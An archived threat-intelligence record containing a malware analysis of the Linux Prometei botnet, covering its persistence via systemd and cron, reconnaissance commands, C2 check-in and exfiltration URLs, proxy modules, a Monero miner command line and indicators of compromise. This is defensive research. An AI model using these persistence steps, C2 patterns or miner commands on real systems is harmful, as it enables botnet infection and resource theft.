{
	"id": "fe9908cb-070c-420a-8609-0ce4d678171c",
	"created_at": "2026-04-06T00:16:18.288792Z",
	"updated_at": "2026-04-10T03:24:29.247654Z",
	"deleted_at": null,
	"sha1_hash": "d3128ce8f1d05643a302db849c620196cba0b89e",
	"title": "IoT Malware Journals: Prometei (Linux) - CUJO AI",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 93384,
	"plain_text": "IoT Malware Journals: Prometei (Linux) - CUJO AI\r\nBy Albert Zsigovits\r\nPublished: 2021-03-10 · Archived: 2026-04-05 18:20:03 UTC\r\nThe IoT Malware Journals series will cover the IoT threat landscape from a technical perspective. For this first\r\narticle in the series, I will analyze the Linux version of the Prometei malware, which first made headlines in\r\nDecember 2020.\r\nWe often find IoT malware that is simply built on the leaked source code of Mirai or Gafgyt. It’s not so typical to\r\nfind new variants that are unique: either wholly written from scratch or ported from other platforms, such as\r\nWindows.\r\nOriginally, Prometei had been a modular Windows botnet that mined the Monero cryptocurrency. In early\r\nDecember, it was discovered targeting Linux environments for the first time. It’s possible that the original\r\ndeveloper(s) were unhappy with the spread of their malware and wanted to take advantage of other platforms.\r\nAnother theory is that this new Linux variant is the work of a completely different group.\r\nPrometei’s C2 IP and URLs are blocked by the Safe Browsing/IP Reputation feature of CUJO AI\r\nSentry. Learn more by reading the Sentry white paper.\r\nintezer prometei botnet\r\nIntezerLabs announcing the discovery of Prometei on Linux\r\nFile analysis of the Linux Prometei version\r\nPrometei binaries are all stripped of symbols and debug information, making reverse-engineering a bit harder. No\r\npacking was applied to the binaries.\r\nMagic information:\r\nELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-TrID:\r\nELF Executable and Linkable format (Linux) (4029/14) 49.77%\r\nELF Executable and Linkable format (generic) (4004/1) 49.46%\r\nEntropy measures the randomness of a given data set and is used to detect signs of packing, encryption or any sort\r\nof compression. 
A value of ~5.7 is a good indicator that what we have here is a native executable without any packing, but we can also check the plain-text strings to be sure.\r\nEntropy:\r\n5.789075219871666\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 1 of 9\n\nPrometei execution flow\r\nFirst, Prometei tries to find out if it can install itself on the system and checks whether a copy of Prometei has been installed on the system previously by looking for Prometei-specific artifacts.\r\nstrace output of the malicious binary\r\nIf the logged-in user does not have sufficient rights (root), Prometei installs itself in “Usermode” and leaves a crashed.dump file in /home/user, which is the malicious binary itself. It also places a custom, machine-specific identification ID under the filename CommId into the /home/user folder.\r\nPrometei Usermode install\r\nIf the user has root privileges, the malicious code will install itself system-wide (“Systemmode”):\r\nPrometei Systemmode install\r\nThen the malware creates a random bot identifier file in /etc/CommId, which has a 16-byte string inside, made up of numbers and capital English letters.\r\nExample IDs:\r\nMU2G1NCM0HDF3L2N\r\n6214X121I3A61W1S\r\n2S53GTBN3H8XTE5J\r\n91S3UJ2R3244U300\r\nIt uses this identifier during the C2 check-in phase. The Prometei bot identifier is passed along in a GET request via the \u0026i= parameter inside the URL. The purpose of this identifier is to keep track of every unique installation on the botnet:\r\nhttp://p1.feefreepool[.]net/cgi-bin/prometei.cgi?r=18\u0026i=MU2G1NCM0HDF3L2N\r\nThe program continues by setting up persistence. 
It places a service file under /lib/systemd/system/uplugplay.service with the following content:\r\nService for persistence\r\nThen, a symlink will be created from /etc/systemd/system/multi-user.target.wants/uplugplay.service to /lib/systemd/system/uplugplay.service. This ensures the binary will be executed upon a restart.\r\nExecution will continue by setting up a scheduled cron job. It is placed into /tmp/task.cron with a reboot command: @reboot means run the following command once after the system reboots.\r\n@reboot /usr/sbin/uplugplay -cron\r\nThen task.cron gets installed via crontab:\r\n# DO NOT EDIT THIS FILE - edit the master and reinstall...# (task.cron installed on Wed Jan 13 15:37\r\nAs a final step, the malware masquerades itself by copying the binary to the following path: /usr/sbin/uplugplay and deleting itself from the original execution location.\r\nDynamic process tracing:\r\nWhen tracing the execution of Prometei, it executes the following commands:\r\nPersistence:\r\nsystemctl daemon-reload\r\nsystemctl enable uplugplay.service\r\nsystemctl start uplugplay.service\r\ncrontab -l\r\ncrontab task.cron\r\nInfection markers:\r\npgrep promet15\r\npgrep uplugplay\r\npidof uplugplay\r\npgrep upnpsetup\r\npidof upnpsetup\r\nGathering information:\r\ncat /proc/cpuinfo\r\ndmidecode --type baseboard\r\ncat /etc/os-release\r\ncat /etc/redhat-release\r\nuptime\r\nThe commands in the first group are used to set up persistence. Then Prometei checks whether it has already been installed on the system via the pidof and pgrep commands in the second group. Finally, the commands in the third group are responsible for gathering information from the victim host.\r\nPrometei botnet network traffic analysis\r\nLet us quickly investigate the C2 communication. Every Prometei bot installation gets tracked by a simple check-in activity, which holds a custom, random identifier. 
Note the old HTTP/1.0 protocol version used.\r\nTraffic can be easily intercepted via a local Python web server:\r\nIntercepting Prometei botnet traffic via Python web server\r\nC2 check-in activity\r\nURI parameters:\r\n?r – randomized with each request, integer between 0 and 30, seems to serve no purpose currently\r\n\u0026i – unique victim identifier, 16-byte string\r\nOnce the check-in completes, the controller immediately sends the sysinfo command for execution, and the collected system information gets sent right back to the botnet controller:\r\nExfiltrating sysinfo output\r\nURI parameters:\r\n?add – base64 encoded information that is collected from the system\r\n\u0026i – unique victim identifier\r\n\u0026h – hostname\r\n\u0026enckey – base64 encoded encryption key\r\nThe base64 encoded section (?add parameter) translates to:\r\ninfo {\r\nv2.92X_Unix64\r\nubuntu-analyzer\r\n1x Intel(R) Xeon(R) Silver 4210 CPU @ 2.20GHz\r\nIntel Corporation\r\n440BX Desktop Reference Platform\r\nUbuntu \u0026 16.04.4 LTS (Xenial Xerus)\r\n/usr/sbin/\r\n14:31:30 up 6 min, 1 user, load average: 0.89, 0.47, 0.22\r\nLinux ubuntu-analyzer 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x8\r\n}\r\nSandbox dynamic run output from Joe Security LLC. Report at https://www.joesandbox.com/analysis/339103/0/html\r\nCommands\r\nNext, the malware enters a dormant state: listening for instructions from its C2 server. 
The following list of commands was available in the examined binary:\r\nCommand – Description\r\nchkport – the msdtc module initiates a port scan on the victim host\r\ndebug – debug the victim host for any issues\r\nexec – executes a binary on the system from a path\r\nextip – fetches the external IP address of the victim\r\nquit – exits the listener process\r\nquit2 – exits the listener function but leaves the process on\r\nset_cc – sets a new C2 IP address\r\nstart_mining – starts the Monero cryptocurrency miner\r\nstop_mining – stops the Monero cryptocurrency miner\r\nsysinfo – gathers information from the victim machine for exfiltration\r\ntouch – creates a file on the victim system\r\nupdatev4 – fetches the latest version of the malware\r\nwget – downloads a file from a URL\r\nxwget – downloads a file from a URL with a 1-byte XOR operation\r\nPrometei traffic routing through proxies and TOR\r\nPrometei has an additional module in which traffic can be routed through TOR or I2P, rather than the conventional HTTP route. 
These modules go under the names:\r\nmsdtc – Proxy client\r\nsmcard – TOR relay\r\nStatus messages of the msdtc proxy client\r\nmsdtc showing status information of the TOR service\r\nWhen Prometei first pulls down these modules, it downloads them via the dwn.php resource:\r\nhttp://178.21.164[.]68/lQ.php?a=t-msdtc\r\nhttp://178.21.164[.]68/lQ.php?a=t-smcard\r\nThe malware runs the following commands to check whether the TOR or proxy modules are already running:\r\npgrep smcard\r\npidof smcard\r\n/etc/smcard\r\n/usr/sbin/smcard\r\nThe proxy request gets executed in an interesting way: the .onion address is base64 encoded and is passed as a parameter to the msdtc module:\r\n/usr/sbin/msdtc aHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9MyZpPU1VMkcxT\r\nThis translates to:\r\n/usr/sbin/msdtc https://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi?r=3\u0026i=MU2G1NCM0HDF3L2N\r\nHow Prometei mines cryptocurrency\r\nPrometei can also deploy a cryptocurrency miner in the form of the application XMRig. The process is usually named updatecheckerd.\r\nStarting and stopping the mining operation\r\nWhen the start_mining command is received from the C2 server, it will connect to the following miner server:\r\n/usr/sbin/updatecheckerd -o stratum+tcp://5.189.171[.]187:3333 -u 4A1txQ9L8h8NqF4EtGsZDP5vRN3yTVKynbk\r\nConclusion\r\nPrometei is another example of how a malicious binary grows on a Linux environment and spreads through the system with persistence. 
Some features of the Windows version of Prometei were not implemented in Linux, meaning that this is most likely an early development version of the malware, and we may see advancements in its capabilities as time goes on.\r\nIt is also unclear whether the same group that developed the malware for Windows is behind the Linux version, and whether the developers are also the ones that distribute this piece of malware. Lately, developer groups have adopted the MaaS (Malware-as-a-service) business model, where they offer malware to be used by others.\r\nWe may learn more about these aspects of Prometei with future versions of the malware.\r\nSpecial thanks to Talos Intelligence for their previous research on the Windows version of Prometei.\r\nCoverage\r\nThe C2 IP and URLs are blocked by the Safe Browsing/IP Reputation feature of CUJO AI Sentry.\r\nIndicators of Compromise:\r\nBinary hashes:\r\nSHA256 ITW name\r\n0302c22471c7da7a4cfd9ef3cb1e35decd8670ee0c00f3f4714b2e918008f4bf –\r\n07cb3e27c8cd53b267ad2f1367735b99d04d3d5b5ecc25d0dedc7856d792eaa2 uplugplay\r\n0eefa989b04824ab190c9582b0068ffbb5bd0abd61dd4933d3abe5cf4a91c6c1 uplugplay\r\n16c6abaa14874194c407174d2ac9f8a6a41386b0aedeea05227233c86f11c84b –\r\n2bc860efee229662a3c55dcf6e50d6142b3eec99c606faa1210f24541cad12f5 –\r\n39052040d4a586f287dddbcc653699ce09c77bb6a336a550b5b349b674bbd46e msdtc2\r\n3ba4dfb78c1eff9fcad3d3229cd78fa976203d01e343f878ec6a4f4b6c2837eb –\r\n417248cd0bf1da8a31c001454d34f3d9a58a7adbc8b5efe287cb0e7d51dd57fc –\r\n45aeade798eee1893d3e7a4d850b882c0d67c6736c287b64edcb8c3ef1d6fb74 –\r\n46cf75d7440c30cbfd101dd396bb18dc3ea0b9fe475eb80c4545868aab5c578c –\r\n5588bbb8604a1aebe8a2e8e7767b7655180d27dfc46025198dcf0cfe3aa3e333 –\r\n6a7781b1fa4c3c4a8f25186d145120c1f814f578ae378a30e0250372f38a0dda 
–\r\n7e040ebba241e95a93e739826953b8cdedf2035c2dffbf7903b7f04c9c2a1fb7 msdtc2\r\n75ea0d099494b0397697d5245ea6f2b5bf8f22bb3c3e6d6d81e736ac0dac9fbc lQ.php\r\n9b4ae19d6de1023fb9d828badaff720d1f4f44268f6d94aa27cf00347dd93e6e uplugplay\r\na3d53930cfe77cd9cb72e076958d29258b2751d1c5a9f58a735e0fcc6019e993 upnpsetup\r\nf037eedb09226097e7a95e9cbdcf75196efce754316f9bcbabbff7a7d402fa30 msdtc\r\nfb84793c36a8a6b71a6426a0899e567f44206c01f62ab8074204aa37e9307244 uplugplay\r\nfecd75ddb8ef7ebfeea559bb167e69a3200c1f5b868b5e592e1a5e9f539940dd –\r\nffc582b02faff5d69943bf1b189b7d57637a87cadef236751c561ae625e928e9 –\r\nVhash:\r\n48f54ad80089ef4bebfedb8fcb0df0e8\r\n69d9f3c8b912fb3a6f17b9f2d63fea9f\r\nTelfhash:\r\nt127e0f882ae3c8e0c8ea20970dcc80690a003ba12c4236f38df14ead0803b209e01cdaf\r\nt121e07d81ea761c0c8ee25630ec816af0e217e71140260b24d795d9d0e43e54ef01ce7f\r\nt12ae072c1ea360c1c8ae29a3098826af0a217eb1200220a24db99c9d0b03a50ef01cd7b\r\nURLs:\r\nhxxp://p1.feefreepool[.]net/cgi-bin/prometei.cgi\r\nhxxp://dummy[.]zero/cgi-bin/prometei.cgi\r\nhxxps://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi\r\nhxxp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32[.]i2p/cgi-bin/prometei.cgi\r\nIPs:\r\n5.189.171[.]187 | DE\r\n88.198.246[.]242 | DE\r\n178.21.164[.]68 | IR\r\nITW names:\r\nmsdtc\r\nmsdtc2\r\nsmcard\r\nsmcard2\r\nupdatecheckerd\r\nuplugplay\r\nupnpsetup\r\nKey:\r\nGtvRsdC7YqIEXKfsICVsKakP-03j9/VleLebEc2bTYGmdiXITbyxwz-PbOtEuMN22r9hwfdHVaojeeMh3gUpa/-FqTFAq/FrwpXyS\r\nConfig 
parameters:\r\n{\"config\":1,\"id\":\"L8AbF4X6u4pX43A8\",\"enckey\":\"HlVYYUweX6WMTV5P+JATR+baodBdDQJWwMEFEOYBMhu7uK3o+BYTWtS\r\n{\"config\":1,\"id\":\"WEx0Pps3ZUh598C8\",\"enckey\":\"A2jscIU2gIo7Te1Ie/q/l4bVCJ/oziW7F5Uf9p8NSNn+fwEOFGVTjGP\r\n{\"config\":1,\"id\":\"gpla9JLFbRSI60gS\",\"enckey\":\"hYv+Qp9ct9xV70M3s9jU3fWWBOvahJqLs/jm/jgrW1ATpX7ODhGoT4Q\r\n{\"config\":1,\"id\":\"505k870uY272Q5E1\",\"enckey\":\"NCdhTiwuebwkgAYF7/45blF0j+1jMHQEhGuYrRx+DCc8WGj5AqKBbBB\r\n{\"config\":1,\"id\":\"T26eZmbJ2uGqnGfl\",\"enckey\":\"k8unMw2Q4pfu63Ta8sD79cKg1VNk2XmPg2Szrh329orjKfItUdyScIC\r\n{\"config\":1,\"id\":\"n2vI4N477vTFBlUk\",\"enckey\":\"4tzTmtpHMr68+lMXX7RdmFiBzalwdWtmYwDJwd23vGnbahRtckEia8w\r\n{\"config\":1,\"id\":\"P4UsWr3b8Y9jn5oB\",\"enckey\":\"Ymmbggs2BddRqk+mv0orU1hN/miqtV/dO09e+hENvs8urxdwpt+U5RT\r\n{\"config\":1,\"id\":\"K24Teqj1aY4tOJb6\",\"enckey\":\"JKBcjf3v2qPvIWCSM7cbobeSU7djVyAfSz643RrJfSPjgn2WpeAy0LB\r\n{\"config\":1,\"id\":\"88E80c47duQxmQl1\",\"enckey\":\"w790UgOXnL014UAmBMYMNGNSzwS7TsO8aylRy52LIgCBQkQoDVNZFdz\r\n{\"config\":1,\"id\":\"9oS6dQUQGSVQT3Bx\",\"enckey\":\"XYkzd3GAyMkoxadx5tGOgNmbn7nbyicXMNzuxrNYWRRa76nCmWEqPyx\r\n{\"config\":1,\"id\":\"0yUhdo2DH6R4L1DS\",\"enckey\":\"blWV9WpaVO0tLHUuB2Dun1r9EQ0rNitZA1d3SwLopoly4rCyBkoUiOM\r\n{\"config\":1,\"id\":\"29GRN59seMW6R9xq\",\"enckey\":\"F5mGmixSHYDjcbmAJfOmEXB76jhOuJma/mH6rLvvDgqAscm+TJxiD79\r\n{\"config\":1,\"id\":\"mO123CwT2U68awpK\",\"enckey\":\"2Jr3crhwoE/IUN5x3MA7YSahJfWC9l6MmzXGLquwZYIWy6rYlFcuM1D\r\n{\"config\":1,\"id\":\"RJ372033v7RyJCSG\",\"enckey\":\"6nKA769q5CexBQxyhZdE3LD2IPdGufwt2qjv1kLq5w59ZJEGS1DhMya\r\nSource: https://cujo.com/iot-malware-journals-prometei-linux/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cujo.com/iot-malware-journals-prometei-linux/"
	],
	"report_names": [
		"iot-malware-journals-prometei-linux"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d3128ce8f1d05643a302db849c620196cba0b89e.pdf",
		"text": "https://archive.orkl.eu/d3128ce8f1d05643a302db849c620196cba0b89e.txt",
		"img": "https://archive.orkl.eu/d3128ce8f1d05643a302db849c620196cba0b89e.jpg"
	}
}